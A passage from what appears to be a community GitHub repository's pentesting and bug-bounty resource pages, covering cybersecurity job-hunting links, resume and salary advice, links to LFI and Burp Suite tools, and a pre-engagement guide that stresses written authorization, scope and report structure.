#Cybersecurity Job Hunt🧵 by Offensive Security]\n\n\n- 🔴Build a Strong Resume \n\n ➡Resume Now: https://resume-now.com/build-resume\n ➡Novoresume: https://novoresume.com\n ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology\n\n- 🔵Interview Prep \n \n ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ\n ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions\n ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf\n\n- 🟣 YouTube Channels\n \n ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0\n ➡Resume reviews with Neal Bridges:https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p\n ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d\n" }, { "path": "CyberSecurityJobs/Jobs.md", "content": "## Table of Contents for Jobs\n\n- [0. Weekly_Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)\n- [1. Types of Company](#1-types-of-company)\n- [2. Types of High Paying Jobs & responsiblities](#Types-of-High-Paying-Jobs-&-responsiblities)\n- [3. IT COMPANY offer Jobs](#IT-COMPANY-offer-Jobs)\n- [4. Cybersecurity jobs at Startups](##Cybersecurity-jobs-at-Startups)\n- [5. Remote Jobs Search portal](#Remote-Jobs-Search-portal)\n- [6. Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)\n--------------------------------------------------\n## **0. Weekly Cybersecurity Hiring October 2022**\n\nIf you're looking for new opportunities then do check this out. We update jobs opening on Every Week.\n\n- [ACCEIS](https://www.acceis.fr/), a french cybersecurity company, is looking for experienced [**pentesters**](https://www.acceis.fr/nos-offres-demploi/auditeur-en-cybersecurite/). The job is based on Rennes, France 🇫🇷 (hybrid remote, French citizenship required). [Other positions](https://www.acceis.fr/nos-offres-demploi/) are available too.\n\n## **0. Weekly Cybersecurity Hiring September 2022**\n\n- After recent Data Breach, [Uber opened multiple position for Senior Security Engineer roles at\nMultiple Locations](https://www.uber.com/in/en/careers/list/?query=security)\n- CYware have some [remote job Opening for you](https://cyware.com/careers)\n- Browse the jobs ReturnOnSecurity.com curates and [apply for what matches your interests.](https://returnonsecurity.pallet.com/jobs)\n- Muliple Jobs opening at [\"forgepointcap\"](https://jobs.forgepointcap.com/jobs)\n- [Karl Sharman curated latest cybersecurity jobs](https://www.linkedin.com/feed/update/urn:li:activity:6891791435532775424/). All roles are based remotely in the US unless otherwise stated, and all salaries are base only. If you are interested, you can discuss via karl.sharman@stottandmay.com.\n\n## **0. Weekly Cybersecurity Hiring Aug 2022**\n\n **Week 01-05 Hiring - August 2022**\n- [Cybersecurity-NxxT hiring Secuirty Intern](https://www.linkedin.com/posts/itsaftab_cybersecurity-internship-activity-6941036757408710657-Ld5G)\n- [Q3 2022 Information security hiring](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)\n- [HCL campus Hiring - NOIDA(INDIA)](https://forms.office.com/r/TUPAWePirU)\n- [Jumio is hiring for 2-3 YoE security engineer](https://jobs.jobvite.com/jumio-corporation/job/oIqxkfwJ)\n- Pentesters Hiring - Trivandrum/kochi(INDIA) - Send resume to rawal.p@spectral.in\n- Security Engineer/Sr Security Engineer for Appsec, GRC, Cyber Defense, Data Protection & Infosec roles.(Experience ranging from 3 to 9 years. Location - Bangalore ) If you are interested in exploring any of these opportunities. Please reach out to babitha.s@flipkart.com & chandana.c@flipkart.com for more details.\n- Twitter Have New opening for Infosec. Please goto the https://twitter.com/career\n\n## 1. Types of Company\n\n[Credit iamthefrogy](https://github.com/iamthefrogy)\n\n1. How many types of differnet Companies are there?\n2. Which types of cCompanies do you choose in the intial career?\n\n![type of company](https://user-images.githubusercontent.com/25515871/176593421-6e5c2db1-80cc-42c7-afe9-9108a3bc8850.png)\n\n## 2. Types of High Paying Jobs & responsiblities\n[Credit iamthefrogy](https://github.com/iamthefrogy)\n\n![jobs responsibility ](https://user-images.githubusercontent.com/25515871/176593433-716d93e0-5bd1-401d-b598-f723cf9147c9.png)\n\n----------------------------------------------------------------------------------\n\n## 3. IT COMPANY offer Jobs\n\nIndex | Websites\n-- | --\nCisco | (https://jobs.cisco.com/jobs/SearchJobs/security?21178=%5B207928%5D&21178_format=6020&listFilterMode=1)\nDeliotte | (https://jobsindia.deloitte.com/)\nSisainfosec | [Provide cybersecurity service to almost all the series startups in India](https://www.sisainfosec.com/careers/)\nIBM | (https://www.ibm.com/in-en/employment/)\nOracle | (https://eeho.fa.us2.oraclecloud.com/hcmUI/CandidateExperience/en/sites/CX_1/requisitions?location=India&locationId=300000000106947&locationLevel=country)\nJupiter Network | (https://careers.juniper.net/#/)\nMcAfee | (https://careers.mcafee.com/location/india-jobs/731/1269750/2)\nSynopsys | (https://www.synopsys.com/careers/global/south-asia/india.html)\nCloudSEK | (https://cloudsek.com/openings/)\nSentinelone | [Planning to invest $50million in India](https://www.sentinelone.com/careers/)\nCyberArk | (https://careers.cyberark.com/)\nCyraacs | (https://cyraacs.com/careers/)\nK7 Computing Pvt. Ltd | (https://careers.k7computing.com/)\nBugcrowd | (https://www.bugcrowd.com/about/careers/?gh_jid=676938#openings)\nHackerone | (https://www.hackerone.com/careers)\nintigrti | (https://careers.intigriti.com/)\nyeswehack | (https://jobs.yeswehack.com/en/)\nRedTeam Hacker Academy Pvt. Ltd. | (https://redteamacademy.com/careers/)\nFireCompass | (https://www.firecompass.com/careers/)\nAppSecure | (https://www.linkedin.com/company/appsecuresecurity/?originalSubdomain=in)\nPentabug by AppSecure | (https://www.linkedin.com/company/pentabug/)\n*Qualys - Pune opening | (https://www.qualys.com/careers/?p=search&q=research)\n*Tenable - Atatck surface management| (https://careers.tenable.com/search/jobs) \nMore 120+ Company in Cybersecurity | (https://cybersecurityventures.com/cybersecurity-companies-list-hot-150/#hot-150/?view_15_per_page=150&view_15_page=1)\n\n\nNOTE: For Such as IBM, Meta, Amazon, Netflix, Alphabet etc Recommend you to apply through reffral only.\nEg With referal you can attempt Interview thrice in month Alphabet if you're resume got selected.\n\n## 4. Cybersecurity jobs at Startups\n- [Cybersecurity jobs at Startups](https://www.ycombinator.com/companies?query=cybersecurity)\n\n## 5. Remote Jobs Search portal\n- Here's 14 websites to find remote cybersecurity and tech jobs:\n\nIndex | Websites\n-- | --\n\n1. | | Hired\n2. | Flex Jobs\n3. | Jobspresso\n4. | Remote OK\n5. | Just Remote\n6. | JS Remotely\n7. | Daily Remote\n8. | Remote Leaf\n9. | Remote Work\n10. | Remote Leads\n11. | AngelList Talent\n12. | Working Nomads\n13. | Product Hunt Jobs\n14. | We Work Remotely\n\nIndex | Websites\n-- | --\n-> | (https://remoteok.com)\n-> | (https://showwcase.com)\n-> | (https://remotive.io)\n-> | (https://remoteglobal.com)\n-> | (https://devsnap.io)\n-> | (https://workingnomads.co)\n-> | (https://triplebyte.com)\n-> | (https://nodes.co)\n-> | (https://epicjobs.co)\n-> | (https://remotehunt.com)\n-> | (https://weworkremotely.com)\n-> | (https://flexjobs.com)\n\n## 6. [Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)\n" }, { "path": "CyberSecurityJobs/Readme.md", "content": "Welcome to [Resthacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)\n\n[![IT Job Helpdesk](https://img.shields.io/badge/-IT_Job_HelpDesk-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-IT_JobHelpDesk) \n[![Advice for cybersecurity Jobs](https://img.shields.io/badge/-Resources_for_Cybersecurity_Jobs-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Advice) \n[![Cybersecurity Domain v2 ](https://img.shields.io/badge/-Cybersecurity_Domain-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Cybersecurity_Domain) \n\nFor **Job**👨‍💼🧑‍💼 :\n\n- Understand domain & choose your Goal.\n- Find your Mentor.\n- Validate your Career and Goal with Mentor.\n- Complete the course(Free/paid) to intensify learning\n- Build a Project, Resume & Cover letter.\n- Attend 2 Mock - 1 with Community & 1 interview with your Mentor.\n- Apply & Get a Job. \n\n---\n![Cybersecurity Desipline and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)\n\n---\n\n## 1. IT Job Helpdesk\nIndex | Topics\n---|---\n**0** | [Resume and cover letter tamplete](https://drive.google.com/drive/folders/1U2h882fksjfojdmcvPAeY-8TEZ1E3Oci?usp=sharing) & [Cover letter example](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CoverLetter.md)\n**0** | [CyberSecurity Mentorship](https://cybermentordojo.com/)\n**1** | [Watch technical mock interviews with engineers from Google, Amazon, and more](https://interviewing.io/recordings/)\n**2** | [Internships Opening](https://github.com/paralax/awesome-cybersecurity-internships)\n**3** | [Jobs- Search](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md)\n**4** | [Roles/disciplines best fit your abilities, experience, and interests in cybersecurity career.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CybersecuityDiscipline.md)\n\n\n\n## 2. Advice and more for cybersecurity Jobs\nIndex | JobsHelpDesk\n---|---\n**0** Cyber Career Pathways Tool | [Understand the Role & responsibility of Positions](https://niccs.cisa.gov/workforce-development/cyber-career-pathways-tool)\n**0** Sans | [Popular Cybersecurity Postion in 2022 ](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n**1** Iamthefrogy | [Resume Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/resume.md)\n**2** Iamthefrogy | [Internship Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Intership_Advice.md)\n**3** Pnetsterlabs | [The interview for entry level cybersecurity Jobs](https://blog.pentesterlab.com/the-interview-9706357fd532)\n**3** Cisco | [Job Searching & Interviewing](https://blogs.cisco.com/security/the-more-you-know-job-searching-interviewing)\n**4** Jhaddix | [A hackers guide to FINDING cybersecurity jobs](https://www.jhaddix.com/post/a-hackers-guide-to-finding-cybersecurity-jobs)\n**5** Placement Materials - Ankush Banik | [Aptitude solutions, Coding round and HR round](https://drive.google.com/drive/folders/1SkCOcAS0Kqvuz-MJkkjbFr1GSue6Ms6m)\n**6** Salary Negotiation | [Updating More](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/SalaryNegotiation.md)\n**7** [Interview Questions for cybersecurity domains](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)\n\n\n### 3. Cybersecurity Domain v2 - Richard Bejtlich's\n \n Note : Do checkout \"0. Popular Cybersecurity Postion in 2022 by sans\"\n\n![cybersecurity mindmap](https://user-images.githubusercontent.com/25515871/179057689-e33e9681-55bf-4b31-803b-a1c41d9fadfa.jpg)\n\nNote: Contents inside the **RESETHACKER** is to help the community and all the content belongs to respective Authors and Team RESETHACKER.\n\n" }, { "path": "CyberSecurityJobs/SalaryNegotiation.md", "content": "NOTE: Percentage of people that don't negotiate their salary are very high but If everything goes really smooth then you should negotiation it.\n\nFor Salary negotiation After hearing the offer form HR just maintain the silence for 10-15 Sec or It will be best if HR say something. \nThen Thank them and Always add atleast 10% more from the offered salary or Based on market value or expected salary.\n\n-> HR Says NO or Making excuse (Don't worry)\nI was expecting b/w 12 Laks to 15 Lakhs. (give them hint)\n\n-> If HR still says No then \nAsk for Sign on bonus?\n\"Do you have **Sign on bonus** that will help me a lot and It'll maintan the Gap between offered salary and expected salary.\n\n-> Still No or you have already an offer \nSpeak cleary, What you want ? and tell them about the offer.\n\n-> Still no then \nGive them the time or ask for the time period.\n\nYou'll get in middle for sure or may be you'll get your expected salary.\n\n\nUpdating More Soon .......\n" }, { "path": "CyberSecurityJobs/internships.md", "content": "[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)\n" }, { "path": "CyberSecurityJobs/resume.md", "content": "Index | Topics\n-- | --\n**1** | Resume Writing & Advise\n**2** | LinkedIn – Why create a quality profile?\n\n\n## 1. Resume Writing & Advise – How not to blunder?\n[Credit:iamthefrogy](https://github.com/iamthefrogy)\n\nDo you want to break into cybersecurity but don't have the experience to show on your resume?\n\nNo worries.\n\nHere are ten great resume-building activities that will make you stand out from the competition: (Thanks to Naomi Buckwalter for compiling this list -\nhttps://www.linkedin.com/in/naomi-buckwalter/)\n1. Volunteer with a cybersecurity conference\n2. Teach a cybersecurity class\n3. Mentor a student\n4. Join a cybersecurity working group\n5. Contribute to an open-source project\n6. Build a home lab\n7. Start a blog\n8. Guest on a podcast\n9. Lead a study group\n10. Start a cybersecurity meetup or club\n11. Get a basic CEH, Security+ or equivalent cert\n12. AWS, Azure, GCP, etc. certifications\n13. Find a vulnerability in a reputed website (bug bounty)\n14. Find zero-day and get a CVE id\nOnce you do the majority of these, you would have a good number of things to showcase in your resume and your Interview.\n\nBelow are some common resume blunders I have seen over the years. **Try to avoid it.**\n![resumebuilder](https://user-images.githubusercontent.com/25515871/176604923-8cfa927d-d165-44f5-942f-64200c7561a1.png)\n\n## 2. LinkedIn Advice – Why create a quality profile?\n[Credit:iamthefrogy](https://github.com/iamthefrogy)\n\nOne question to you, do you want to get noticed by reputable persons in your industry? Then it is a must to create a killer LinkedIn profile. Here are the steps\nto create and maintain a perfect LinkedIn profile.\nHow to create a killer LinkedIn profile\n\n![linkedin advice](https://user-images.githubusercontent.com/25515871/176610220-62a55217-559e-4dfa-8c86-3fdbde41077b.png)\n![linkedin advice 2](https://user-images.githubusercontent.com/25515871/176605919-af655061-8a56-4d34-b165-471ad942e71b.png)\n\n\n## HacktheBox/TryHackme – Why create a quality profile?\nUpdating soon\n\n## HackerOne/bugcrowd/Intigrity/yeswehack – Why create a quality profile?\nUpdating soon\n\n## Codechef/Hackerearth etc - Why create a quality profile?\nUpdating soon\n\n\n" }, { "path": "ISO-HelpDesk/Readme.md", "content": "# ISO HELPDESK\n\n**1** [This article discusses \"NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure Controls Framework\"](https://www.complianceforge.com/faq/nist-800-53-vs-iso-27002-vs-nist-csf-vs-scf)\n > And help you decide which Cybersecurity Framework is right for your Organization?\n" }, { "path": "LFI/Lfi.md", "content": "\n\nhttps://github.com/g0tmi1k/LFISuite\n" }, { "path": "LFI/Lfitools.md", "content": "**LFI Tools**\n\n\nIndex | LFI Tools\n---|---\n**1** | [LFISuits](https://github.com/D35m0nd142/LFISuite)\n\n" }, { "path": "LFI/Readme.md", "content": "**LFI(Local File Inclusion )**\n\n\nIndex | Content\n---|---\n**1** | [LFI Documentation]()\n**2** | [LFI Practice labs]()\n**3** | [LFI Disclosure/Reports/POC]()\n**4** | [LFI Mindmap]()\n**5** | [LFI Tools](/LFI/Lfitools.md)\n**6** | [LFI Ebooks]()\n**7** | [LFI Researchers]()\n**8** | [LFI CVE]() \n\n" }, { "path": "Pentesting Cheatsheets/Readme.md", "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\n**1** I-red Team | [Pentesting Cheatsheets]( https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets )\n**2** Chris Dale | [BurpSuite Cheatsheet v1.0](/.PentestingCheatsheets/cheetsheets.md)\n**3** web pentesting Cheetsheet (Intermidiate fav)](https://github.com/riramar/Web-Attack-Cheat-Sheet)\n" }, { "path": "Pentesting Cheatsheets/cheetsheets.md", "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsheets.md)\n\n\n## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :\n \n-**Chris Dale** @chrisadale:- Users can contribute with extensions to aid in the \ndiscovery of vulnerabilities. Be aware of false positives and use your pentesting capabilities to \nensure you fully explore the findings.\n \n-Param Miner \n>Allows high-performance identifying of unlinked \nparameters. Check for unlinked GET and Headers, \nand unlinked POST when applicable.\n\n-Backslash Powered Scanner \n>Will give alerts on interesting transformations of data \nor other interesting things. Often, it will be false positives, but it allows the penetration tester to focus on potential vulnerabilities.\n\n-Software Vulnerability scanner\n>Checks software version numbers against \nvulnhub.com for vulnerabilities.\n\n-HTTP Request Smuggler\n>This is an extension for Burp Suite designed to \nhelp you launch HTTP Request Smuggling \nattacks.\n\n-Active scan++\n>Allows us to find more vulnerabilities in terms of \nsuspicious input transformation, XML input \nhandling, host header attacks and more. \n\n-Retire.js\n>Finds outdated JavaScript and links to the \nrelevant CVE's for your investigations.\n" }, { "path": "Pentesting-BugbountyINDEX.md", "content": "[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n\nPentesting-Bugbounty:(Readme.md)\n \n \tPentesting Sample Reports, timeline, quotation etc > PentestingReports \n \n (PreEngagement.md & Readme.md)\n \n \tPentesting for Researchers\n \tBugBounty-HelpDesk > Bugbounty \n \n (burpsuite.md ,Wordlists.md, Website_inputs_testing.md, Getting_Started_with_Bugbounty & Readme.md)\n \n \tCybersecurity Jobs\n \tCyberSecurity Conferences\n\n 1. Bugbounty > \n \n burpsuite.md ,\n Wordlists.md, \n Website_inputs_testing.md, \n Getting_Started_with_Bugbounty \n & Readme.md)\n \n 3. BurpSuite > \n \n Assets, \n Readme.md ,\n protips.md \n \n 3. CyberSecurityJobs > Readme.md \n \n Careers\n Intership_Advice.md\n Readme.md\n Remotejobs.md\n internships.md\n resume.md \n \n 4. PentestingReports/\n\n PreEngagement.md\n Readme.md \n \n 5. Pentesting_for_Researchers/\n \n PTplatform.md\n Readme.md (PEN TESTERS (INTERNAL AND EXTERNAL - Under Development))\n \n4. Bugbountycheetsheet > Readme.md\n bugbountyplatform.md\n" }, { "path": "PentestingChecklist/Readme.md", "content": "# Checklist\nAuthor | Checklist\n-- | --\n**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)\n**2** Software Secured |[secure-code-review-checklist](https://github.com/softwaresecured/secure-code-review-checklist)\n**3** Unknown | [WAPT Checklist](https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx)\n**4** Tushar Varma | [WAPT Checklist](https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6t )\n**5** Hariprasaanth | [THICK CLIENT PENTESTING CHECKLIST](https://hariprasaanth.notion.site/THICK-CLIENT-PENTESTING-CHECKLIST-35c6803f26eb4c9d89ba7f5fdc901fb0)\n**6** Hariprasaanth | [Web Application PENTESTING CHECKLIST](https://hariprasaanth.notion.site/hariprasaanth/WEB-APPLICATION-PENTESTING-CHECKLIST-0f02d8074b9d4af7b12b8da2d46ac998)\n**6** dafthack | [CLoud pentesting](https://github.com/dafthack/CloudPentestCheatsheets)\n**7** mantisSTS | [A list of web application checks sorted by functionality](https://github.com/MantisSTS/Web-Application-Hacking-List)\n**7** mantisSTS | [IOS Pentesting](https://ios.pentestglobal.com/)\n\n" }, { "path": "PentestingReports/PreEngagement.md", "content": "# Pre-engagement: \nHelp yourself to get your 1st Pentesting client and prepare yourself for client meeting?\n\n ## UNDERSTAND THE TARGET:\n ## Understanding will help you tailor the test and test results\n ## WHAT IS NEEDED TO TEST?\n ### TEST TYPES\n ## SCOPE :\n ## RULES OF ENGAGMENT\n ### CAN THINGS GO WRONG? - answer is YES.\n ### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)\n ## LEGAL REQUIRENMENTS FOR PENTESTING:\n ## Pentest report structure \n ## If you are the Bringing out the clients for organization\n ### IF YOU ARE THE REPORT RECIPIENT\n ## HelpDesk & Reference : \n ### PPre-engagement interaction (Recommended)\n ### Executive Reporting tamplate\n ### Technical Reporting tamplate\n ### A three-part video series on pen testing by Tim Medin(@timmedin)\n\n## Understanding Pre-enganement:\n\n Obtained Legal Permission -> Written Permission from persons in authourity. \n |\n Rules of Engagement -> Defines the scope of the penetration test.\n |\n NDA - > Signed agreement b\\w cleint and provider.\n |\n Begin Penetration Testing \n\n![preengagements](https://user-images.githubusercontent.com/25515871/178856364-69087dd6-2458-467d-a3c2-60d2a2fcf464.png)\n\n\n## What are the legal considerations for pentests?\n\nFor pentests, you need to have a contract in place before starting the engagement. \nThe contract is often referred to as your get-out-of-jail-free card, but keep in mind \nthat you could still be arrested for performing a pentest even if it's authorized.\n\nSome other key legal considerations are outlined here:\n \n ‚ *Legal Authority* - Does the client really own the systems and/or applications they want you to test?\n ‚ *Damage Control* - Will the client assume liability for any interruptions or damage that occur as a \n result of the pentest, or are you responsible?\n ‚ *Hack-back* - What happens when third-party data or services are damaged as a result of the \n pentest? Who is responsible?\n ‚ *Licensing* - Do you need a private investigator license and Certification (gpen,cept, lpt and private investigator license) to perform a pentest?\n ‚ *Privacy Issues* - Which jurisdiction will be recognized for the pentest? For example, if you are testing offices in Alabama and Virginia, \n which state's laws will apply to the engagement?\n ‚ *Data Ownership* - Who owns any new methods or tools that are developed as a result of the pentest engagement?\n ‚ *Duty To Warn* - Is there a duty to warn third parties about pentest results based on the findings? \n For example, you discover a high-severity zero-day exploit as a result of a pentest. \n Do you report it?\n \n Scope of Work\n Professionalism\n\n## What are the Methodology/phases of pentesting?\n\nThis question could have different answers, depending on the hiring manager having real pentesting experience\nor just passing a few knowledge-based certification exams.\n\n If you go by the penetration testing execution standard (PTES), there are seven \n phases of pentesting, which are pre-engagement, intelligence gathering, threat \n modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.\n\n If you take a popular knowledge-based certification exam, the phases are \n reconnaissance, scanning and enumeration, gaining access, maintaining access, and \n covering tracks\n\n## UNDERSTAND THE TARGET:\n \n Tester: You need to work to understand the target to design a better test\n Testees: You need to understand yourself so you can steer the test and design\n Recipients: What do you want from the test? What kind of output?\n\n Best Advise : NEVER ASSUME - Ask the dumb question\n eg :\n “I can guess, but I don’t like to be wrong, so can\n you describe for me what data or process if lost,\n destroyed, stolen, or leaked would cause the\n greatest damage to your organization?”\n\n## Understanding will help you tailor the test and test results\n\n Why is the test being done? Compliance? Improved posture?\n Who is the size/class of yout network?\n What are the security goals and goal of pentesting?\n How many Ip's the nerwork have?\n How many web pages and input form the application have?\n What are the *biggest risks* to the org?\n You need to identify the goals of pentesting and BUSINESS RISK of client.\n \n ![business risk](https://user-images.githubusercontent.com/25515871/177207195-029b84f2-7fdb-4b55-b36f-4c1af8514bf5.png)\n\n## WHAT IS NEEDED TO TEST?\nOrganizational goals will define the test.\nSometimes the test type is the first point, sometimes it is scope. \nIt all depends on the goals and background information.\n \n 1. Scope\n 2. Types of tests\n And Rules of engagement\n\n### TEST TYPES\n \n Network pentesting (Internal Network & External Network also include by bypassing IDS & IBS)\n Assumed Breach\n Egress & C2 testing\n Red Team\n Purple Team\n Phishing\n Social Engineering\n *Web App & API testing\n *Mobile App pen testing\n cloud penitration testing\n Wireless pen testing\n Hardware/physical pentesting\n Many others...\n \n## SCOPE :\n\n What is in scope? – This determines time (and cost)\n What is out of scope?\n Yes, this is the same question, but ask it too and \n you will get extra information\n Why is it out of scope?\n What is owned by someone else?\n \n## RULES OF ENGAGMENT\n\n What can *testers do* without additional permission?\n What should *testers not do* without additional permission?\n Usually pretty simple, simple enough to be a simple list\n Pre-approve engagement potentially are more dangerous attacks, such as password guessing.\n All other \"riskier/ENGAGMENT\" things need approval.\n \n ### CAN THINGS GO WRONG? - answer is YES.\n \n Most common Systems crash on their own and there is an increased risk with atypical traffic.\n Does it happen all the time? No\n Can it? Of course\n Never guarantee 100% uptime, because no SLAs are 100%\n And Learn from mistakes (redsiege.com/askus) \n \n ### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)\n \n Contact numbers for testers and target, including backups\n Secure communication methods\n Regular discussion times on longer tests\n For longer create follow up tamplete to keep up with clients.\n Advice for ORG: Always ROTATE TESTING in ORGS. \n If you never rotate, you will go out of business almost immediately.\n \n For indivisual pentester:\n Don't be affered to approch the ORGS for TESTING.\n ORGS Maybe looking for different testers after a certain time.\n\n\n## What is the content of a well-written pentest report?\nThe typical penetration test report is structured in the followed sections:\n\n 1. Cover page and Vulnerability Title\n 2. info (Table of content )\n 3. Executive Summary, technical report Summary\n \n - An executive summary should be one page or less and should highlight exciting pieces of the report's findings.\n Think of this part as marketing, and you need to get the stakeholder to buy what you are selling \n so that they finish reading the full report.\n \n 4. Mode of operating (Methodology & also include OWASP Risk Rating)\n 5. A copy of original Test Scope of work that signed as part of contract. \n - (Company checklist as per as clients requirenmets or company/indivisual own clecklist)\n \n 6. Findings Summary \n - A summary of vulnerabilities that you found. A simple pie-chart graphic works well for this if you \n categorize the vulnerabilities.\n 7. Details of the testing team and tools that were used in the engagement\n 8. Findings (Include Vulnerability Title, Vulnerability Type, POC- steps to reproduce, SS , links, impact, CVSS Score, suggestion to fix etc)\n 9. Recommendations(Final Thoughts & Tips)\n 10. Appendix (Appendices)\n \n Revisions (Change history after submitting the report to client)\n \n## If you are the Bringing out the clients for organization\n \n 0. As a Tester, you need to understand Attackers have a near infinite amount of time\n No one is going to pay an infinite amount of money*\n So Set a realistic duration to get optimal results.\n 1. Clients may just ask you to conduct pen test and don't know all the technical details and expect a good test.\n It's your Job is to teach test types and understand there requirenment by asking the righ questions, not shame them.\n 2. Testers need to be available for outages, questions, or external compromise.\n 3. Testers must Know your procurement process! and know their holiday schedule!\n 4. If the target doesn't improve their security posture, you have been a waste of time.\n \n### IF YOU ARE THE REPORT RECIPIENT\n Ask for what you want ahead of time \n eg Some orgs want data in a spreadsheet or CSV , may ask for executive report or developer report etc\n Does the sample report have the info you want or need?\n Use the pen testers! Setup a debrief call to go through the report if you need it!\n \n \n## Reference : \n ### [Pre-engagement Interactions](https://pentest-standard.readthedocs.io/en/latest/preengagement_interactions.html)\n ### Executive-Level Reporting\n\n Business Impact\n Customization\n Talking to the business\n Affect bottom line\n Strategic Roadmap\n Maturity model\n Appendix with terms for risk rating\n \n \n ### Technical Reporting\n\n Identify systemic issues and technical root cause analysis\n Maturity Model\n Technical Findings\n\n Description\n Screen shots\n Ensure all PII is correctly redacted\n Request/Response captures\n PoC examples\n Ensure PoC code provides benign validation of the flaw\n\n Reproducible Results\n\n Test Cases\n Fault triggers\n\n Incident response and monitoring capabilities\n\n Intelligence gathering\n Reverse IDS\n Pentest Metrics\n Vuln. Analysis\n Exploitation\n Post-exploitation\n Residual effects (notifications to 3rd parties, internally, LE, etc…)\n\n Common elements\n\n Methodology\n Objective(s)\n Scope\n Summary of findings\n Appendix with terms for risk rating\n \n ## How do you measure the results of a pentest?\n \n It depends on what the organization is looking to measure. Common things to track are the criticality of findings,\n how many issues that surfaced in the pentest actually get fixed, what types of vulnerabilities and exploits are \n being discovered, and which new issues have been identified since the last pentest.\n \n## How often should organizations have an external pentest performed?\n\n This answer depends on their compliance requirements, but generally, this should happen at least once a year\n and preferably on a quarterly basis. One thing you will notice when you're working as a pentester is that \n many companies will not fix any of the issues you report, so you might come back a year later and identify the \n same issues.\n\n ### A three-part video series on pen testing by Tim Medin(@timmedin)\n[PART 1: THE START ](https://youtu.be/23F8QKTu86U)[Pentest process.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9042034/Pentest.process.pdf)\n\n[PART 2: THE METHOD](https://redsiege.com/pentestprocess2) [Slides](http://www.redsiege.com/wp-content/uploads/2021/03/20210309-PEN-TEST-PROCESS-P2-THE-METHOD.pdf)\n\n[PART 3: THE REPORT](https://www.youtube.com/watch?v=oyJ0atDagco) [Slides](https://redsiege.com/pentestprocess3)\n\n" }, { "path": "PentestingReports/Readme.md", "content": "Note: Contents inside the **RESETHACKER** is to help the community and all\nThe content belongs to the respective authors and Team RESETHACKER.\n\n1. [Pentesting Pre-Engagements Advice](#Pentesting-Pre-Engagements-Advice)\n2. [Pentesting NDA & Saas Aggrement form ](#Saas-Agrement-form)\n3. [Pentesting Report Samples:](#Pentesting-Report-samples)\n4. [Pentesting Report videos - How to write pentest Report?](#Pentesting-Videoes-How-to-write-pentest-report?)\n5. [Pentesting Timelines](#Pentesting-timelines)\n6. [Penetration quotation](#Penetration-quotation)\n\n\n## [Pentesting Pre-Engagements Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/PreEngagement.md)\n\n ✅ Pre-engagement: \n - Help yourself to get your 1st Pentesting client and prepare yourself for client meeting?\n\n ✅ UNDERSTAND THE TARGET:\n ✅ Understanding will help you tailor the test and test results\n ✅ WHAT IS NEEDED TO TEST?\n - TEST TYPES\n ✅ SCOPE :\n ✅ RULES OF ENGAGMENT\n - CAN THINGS GO WRONG? - answer is YES.\n - OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)\n ✅ LEGAL REQUIRENMENTS FOR PENTESTING:\n ✅ Pentest report structure \n ✅ If you are bringing out the clients for organization\n - IF YOU ARE THE REPORT RECIPIENT\n ✅ Reference : A three-part video series on pen testing by Tim Medin(@timmedin)\n\n## Pentetsing NDA & Saas Aggrement form \n\n- [NDA & SaaS Agrements form](https://drive.google.com/drive/folders/1dvUVNM5WnV9sFWL0BVHvJUNP44_bqhRj?usp=sharing)\n- [Pentesting Agreements form](https://drive.google.com/file/d/1qA2_K5mYqYwhzKYnAJ7WPsktZ9kWlQEI/view?usp=sharing)\n\n\n## Pentesting Report 